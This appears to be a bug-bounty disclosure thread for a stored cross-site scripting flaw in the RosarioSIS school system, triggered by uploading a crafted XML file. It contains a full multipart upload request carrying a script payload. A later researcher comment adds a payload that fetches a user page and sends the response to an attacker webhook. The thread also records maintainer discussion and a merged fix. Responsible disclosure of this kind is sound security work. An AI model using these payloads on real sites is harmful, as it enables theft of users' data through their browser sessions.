Cross-site scripting - Stored via upload xml file in francoisjacquet/rosariosis

Valid

Reported on

Apr 23rd 2022


Description

When user upload file with XML extension in white-list, server will stored XML file at assets/PortalNotesFiles/, so we can direct access and execute javascript code.

Proof of Concept

POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2762
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"

<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"

<h1>123</h1>
![]("/>)
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.xml"
Content-Type: image/png

<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"


-----------------------------3345002182489293764621537208--

PoC images

image image

Impact

This vulnerability can be arbitrarily executed javascript code, steal user'cookie, etc...

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. a month ago
Nhien.IT modified the report
a month ago
Nhien.IT
a month ago

Researcher


Hi @admin, can you contact with maintainer?

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back a month ago
Jamie Slome
a month ago

Admin


@nhienit2010 - contact has been established with the maintainer, as you can see in the status message above ­čĹŹ

Let me know if you have any further questions.

Fran├žois
a month ago

Maintainer


Hello @nhienit2010

Thank you for reporting the issue. The xml file is opened in a new browser tab. As far as my test goes, I was not able to retrieve the session cookie. Were you? If so, please update your example.

Fran├žois
a month ago

Maintainer


Oh, cookie is set to HttpOnly so it cannot be retrieved.

Now, being in a new tab, the xml file is executed by the browser just like any other file you might open or find on the Internet.

Could you please explain how this could leak user session or other info related to RosarioSIS?

Nhien.IT
a month ago

Researcher


Hello @maintainer,

Because XML file upload in your website, so with same origin policy, so javascript code in the malicous XML allow fetch other user information and send to attacker's host, sometime this vulnerability allow attacker perform HTTP request in victim browser.

Sample payload

<html>
    <head></head>
    <body>
        <info>
          <name>
<value><![CDATA[<script>fetch("https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php").then(r=>r.text()).then(d=>navigator.sendBeacon("https://<my-webhook>", d))</script>]]></value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

Image PoC

image

Fran├žois Jacquet validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Fran├žois Jacquet confirmed that a fix has been merged on 90842c a month ago
Fran├žois Jacquet has been awarded the fix bounty
FileUpload.fnc.php#L842 has been validated
to join this conversation